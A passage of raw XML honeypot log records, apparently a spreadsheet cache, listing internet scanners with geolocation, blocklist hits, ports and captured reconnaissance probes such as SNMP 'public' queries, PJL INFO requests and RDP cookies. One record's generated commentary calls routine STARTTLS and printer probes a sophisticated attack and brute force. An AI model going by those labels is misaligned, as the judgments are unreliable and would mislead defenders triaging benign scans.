    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8d91"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="64"/>
    <x v="64"/>
    <s v="motivating.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:07:44"/>
    <d v="2023-12-01T08:51:00"/>
    <d v="2025-04-30T21:07:44"/>
    <n v="387"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_MYSQL_H4&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_REDIS_H20&amp;&amp;SMA-LAB_IRC_H2"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;3306&amp;&amp;6379&amp;&amp;22&amp;&amp;12715&amp;&amp;1433&amp;&amp;1080&amp;&amp;9100&amp;&amp;1521&amp;&amp;33146&amp;&amp;56295&amp;&amp;NA&amp;&amp;389&amp;&amp;6667&amp;&amp;443&amp;&amp;110&amp;&amp;80&amp;&amp;5900&amp;&amp;25&amp;&amp;21&amp;&amp;143&amp;&amp;445&amp;&amp;23&amp;&amp;39033"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'cvvmvsqo', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.96;tag=cvvmvsqo', 'max-forwards': '0', 'to': 'sip:38.54.115.66', 'via': 'SIP/2.0/UDP 87.236.176.96:5060;branch=z9hG4bKcvvmvsqo;received=87.236.176.96;rport=34341'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.96,36243)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.96,47187)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 203.29.241.98:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2021-11-25 11:34:08"/>
    <s v="2029-11-25 11:34:08"/>
    <s v="2024-10-10 09:48:31"/>
    <s v="['ALEXIS.NS.CLOUDFLARE.COM', 'RUTH.NS.CLOUDFLARE.COM']"/>
    <s v="NAMECHEAP INC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="3"/>
    <s v="NA"/>
    <s v="Kalkofnsvegur 2"/>
    <s v="::ffff:57ec:b060"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <s v="Denial Scan"/>
  </r>
  <r>
    <x v="65"/>
    <x v="65"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:07:36"/>
    <d v="2023-07-29T17:27:00"/>
    <d v="2025-04-30T21:07:36"/>
    <n v="1286"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_REDIS_H38"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5432&amp;&amp;161&amp;&amp;1433&amp;&amp;23&amp;&amp;21&amp;&amp;1080&amp;&amp;445&amp;&amp;389&amp;&amp;9100&amp;&amp;3306&amp;&amp;443&amp;&amp;1521&amp;&amp;6379&amp;&amp;3389&amp;&amp;NA&amp;&amp;143&amp;&amp;110&amp;&amp;54696&amp;&amp;6667&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="connection&amp;&amp;query&amp;&amp;command&amp;&amp;request&amp;&amp;NA&amp;&amp;GET&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,65024)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,65026)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,65028)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,58118)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,58130)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,58140)}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BlyYahNCN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CgTzbJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bYmbth'}}&amp;&amp;{Data_ORACLE:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1814"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="66"/>
    <x v="66"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:02:48"/>
    <d v="2024-04-14T10:30:33"/>
    <d v="2025-04-30T21:02:48"/>
    <n v="139"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_NTP_H18&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_FTP_H3&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_PJL_H20&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;21&amp;&amp;389&amp;&amp;9100&amp;&amp;5432&amp;&amp;1080&amp;&amp;143&amp;&amp;110&amp;&amp;16797&amp;&amp;NA&amp;&amp;1433&amp;&amp;5900&amp;&amp;445&amp;&amp;443&amp;&amp;3306&amp;&amp;3389&amp;&amp;23&amp;&amp;1521&amp;&amp;80&amp;&amp;54981"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="103"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;request&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.138,62702)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.138,62714)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.138,60752)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ICDGcjfgY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gLUSxs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pWfnUL'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f8a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible malicious activity: User attempted to establish encrypted connection using TLS protocol to authenticate with FTP service. This could indicate an attempt to hide malicious traffic from detection or use a known vulnerability in the server's SSL/TLS implementation. &amp;&amp; Possible malicious activity detected: An attempt to authenticate using TLS encryption, which could be an attempt to exploit a vulnerability or bypass security measures. This suggests an attacker is trying to establish a secure connection for unauthorized access. The use of TLS encryption in this context may indicate a sophisticated or targeted attack. &amp;&amp; This log entry indicates an attempted scan or probing of a service, possibly for vulnerability exploitation, with no specific malicious activity detected yet. No further action was taken as the attempt seemed non-intrusive. The service itself remains unharmed from this attempt. &amp;&amp; The data suggests an attempt to extract printer information from the system, possibly for reconnaissance or to identify vulnerabilities. This could be a prelude to more malicious activities. The command is likely sent by a remote attacker attempting to gather sensitive information. &amp;&amp; Malicious actor attempting to obtain printer information, possibly as part of a larger attack or reconnaissance effort. This could be an initial probe for potential vulnerabilities within the system. The actor is trying to extract specific details from the printer's configuration."/>
    <s v="TLS Attack &amp;&amp; SSL Auth &amp;&amp; Brute Force"/>
  </r>
  <r>
    <x v="67"/>
    <x v="67"/>
    <s v="sustainable.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:57:24"/>
    <d v="2024-12-11T18:02:15"/>
    <d v="2025-04-30T20:57:24"/>
    <n v="265"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse&amp;&amp;Remote Fingerprinting Activity"/>
    <s v="low"/>
    <s v="SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_REDIS_H20"/>
    <s v="389&amp;&amp;1433&amp;&amp;6379&amp;&amp;9100&amp;&amp;5432&amp;&amp;1080&amp;&amp;21&amp;&amp;1521&amp;&amp;3306&amp;&amp;143&amp;&amp;6667&amp;&amp;443&amp;&amp;110&amp;&amp;80&amp;&amp;39735&amp;&amp;NA&amp;&amp;5900&amp;&amp;25&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;GET&amp;&amp;login&amp;&amp;NA&amp;&amp;query&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'fvhjjgjr', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.81;tag=fvhjjgjr', 'max-forwards': '0', 'to': 'sip:154.26.156.60', 'via': 'SIP/2.0/UDP 